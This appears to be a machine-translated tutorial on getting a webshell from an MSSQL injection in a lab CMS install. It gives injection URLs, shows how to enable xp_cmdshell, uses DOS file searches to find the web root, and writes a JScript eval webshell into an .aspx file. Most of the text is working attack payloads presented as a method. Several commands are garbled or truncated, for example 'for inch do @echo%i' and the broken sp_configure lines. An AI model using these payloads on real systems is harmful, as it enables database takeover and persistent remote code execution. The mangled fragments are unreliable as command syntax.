The process of obtaining Webshell from MSSQL DBA Authority

Objective

This article is mainly a case study of how to get Webshell when MSSQL is DBA authority and does not know the path. Of course, this approach is not valid for the separation of station libraries.
I tested the environment under Win7 64-bit, the database is SQL Server 2000,iis version is 7.5, the program is using the Wind-news cms. Background login After a number of injections, because here is the demo with injection to get webshell, so do not consider the background upload situation, just inject to achieve.

Process

First, find the following injection point:

http://192.168.232.138:81/manage/news/newslist.aspx? Classid=1 ' and 1=user;--

You can see that DBA authority is available through Sqlmap

Create a temporary table

http://192.168.232.138:81/manage/news/newslist.aspx? Classid=1 '; CREATE TABLE tt_tmp (tmp1 varchar (8000));--

Locate the file under Windows with the following command:

 for inch  do @echo%i

For example, to search for newslist.aspx under C-disk, you can use for /r c:\ %i in (Newslist*.aspx) do @echo %i orfor /r c:\ %i in (Newslist.aspx*) do @echo %i

for /r c:\ %i in (Newslist*.aspx) do @echo %isearch results that are used

Be sure to add a * number in the matching mode, otherwise the search is all the directory, the back of the mosaic of your search content.
for /r c:\ %i in (Newslist.aspx) do @echo %isearch results that are used

Execute a command to find a file with xp_cmdshell and insert the results of the search into a temporary table

http://192.168.232.138:81/manage/news/newslist.aspx? Classid=1 '; insert into tt_tmp (TMP1) exec master. xp_cmdshell ' for/r C:%i in (newslist*.aspx) do @echo%i ';--

If the xp_cmdshell cannot be executed and the following error is indicatedSQL Server阻止了对组件‘xp_cmdshell’的过程‘sys.xp_cmdshell’的访问。因为此组件已作为此服务嚣安全配置的一部分而被关闭。系统管理员可以通过使用sp_configure启用‘xp_cmdshell’。

You can use the following command to enable xp_cmdshell

' Show advanced Options ',1; // allow modification of advanced parameters  'xp_cmdshell',1// open xp_cmdshell extension reconfigure;--

Then execute the search command again.

After performing the above search and insert process, you can use the ‘ and (select(*) from tt_tmp)>1 page return to determine if there are any search results. When not found, select(*) from tt_tmp the result is 1, otherwise greater than 1. If not, just change the directory, you can try other letter, such as ‘;insert into tt_tmp(tmp1) exec master..xp_cmdshell ‘for /r d:\ %i in (Newslist*.aspx) do @echo %i ‘;-- . You can also use Sqlmap to view the number of bars.

You can display the contents of the table with an error.

http://192.168.232.138:81/manage/news/newslist.aspx? Classid=2 ' and 1= (select top 1 tmp1 from tt_tmp) and ' a ' = ' a

Keep exploding.

http://192.168.232.138:81/manage/news/newslist.aspx? Classid=2 ' and 1= (select top 1 tmp1 from tt_tmp where TMP1 isn't in (' c:\inetpub\wwwroot\manage\news\NewsList.aspx ')) and ' A ' = ' a

You can also use Sqlmap to read data directly from the table.

Then, depending on the path to the exported results, it is possible to determine whether the Web directory. Then write a test file to see if it can be accessed to further confirm the result.

Here in the root directory wrote a txt file, write the other directory is afraid because there is no permission to access.

http://192.168.232.138:81/manage/news/newslist.aspx? Classid=1 '; EXEC master. xp_cmdshell ' echo Test >c:\\www\\2333.txt ';--

Then visit http://192.168.232.138:81/2333.txt

Successful access, and then just write a sentence

http://192.168.232.138:81/manage/news/newslist.aspx? Classid=1 '; EXEC master. xp_cmdshell ' echo ^<%@ page language= "Jscript"%^>^<%eval (request.item["Pass"], "unsafe");%^> > C:\\www \\233.aspx ';--

when a DOS command writes a file to the text, it encounters <> should be added ^ in front . successfully written. Then there is the further operation, which is not outlined here.

Summarize:

Here are a total of three small points of knowledge:
1.sa how users can turn on xp_cmdshell

' Show advanced Options ',1; // allow modification of advanced parameters  'xp_cmdshell',1// open xp_cmdshell extension RECONFIGURE;

How to search for files under 2.Windows using DOS

 for inch  do @echo%i for on do @echo%i

3.dos command Write file encountered <> how to handle

123. txt

Reference:

[1] Quick Find files under Windows command Line (CMD) (similar to the Linux find command)
[2] technology sharing: MSSQL injection xp_cmdshell

 

The process of obtaining Webshell from MSSQL DBA Authority